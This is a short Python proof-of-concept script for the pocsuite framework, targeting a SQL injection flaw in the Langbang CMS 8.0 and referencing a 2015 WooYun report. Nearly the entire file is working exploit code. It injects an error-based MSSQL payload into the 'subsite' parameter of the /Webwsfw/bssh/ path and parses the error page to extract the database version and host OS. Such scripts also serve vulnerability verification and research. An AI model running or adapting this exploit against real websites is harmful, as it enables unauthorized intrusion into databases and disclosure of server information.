狼邦内容管理系统SQL注入漏洞 /bssh

                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
    
class TestPOC(POCBase):
    vulID = '991010'  # 应该你们定的啊
    version = '1'
    author = 'feng&baozi'
    vulDate = '2015-06-18'
    createDate = '2015-09-02'
    updateDate = '2015-09-02'
    references = ['http://www.wooyun.org/bugs/wooyun-2015-121366']
    name = '狼骑CMS注入漏洞'
    appPowerLink = 'http://www.langbang.net/'
    appName = ''
    appVersion = '8.0'
    vulType = 'SQL Injecion'
    desc = '''
        subsite参数没有做过滤导致可以注入，造成信息泄露
    '''
    # the sample sites for examine
    samples = ['']
    
    def _attack(self):
        payload = ' and 1>(select @@version)--'
        response = req.get(self.url+'/Webwsfw/bssh/?subsite=1'+payload)
        if 'Windows NT' in response.content:
                return self.parse_attack(response)
        
    def _verify(self):
        return self._attack()
        
    def parse_attack(self, response):
        output = Output(self)
        result = {}
        if response:
            result['DBInfo'] = {}
            dbpat = 'Microsoft SQL Server (.*)\s'
            rs1 = re.findall(dbpat,response.content)
            if rs1:
                result['DBInfo']['Type'] = 'Microsoft SQL Server '+rs1[0]
            ospat = 'Enterprise Edition (.*?)\(Hypervisor\)'
            rs2 = re.findall(ospat,response.content)
            if rs2:
                result['DBInfo']['OS'] = 'Enterprise Edition '+rs2[0]
            output.success(result)
        else:
            output.fail('SQL Injecion failed')
        return output
register(TestPOC)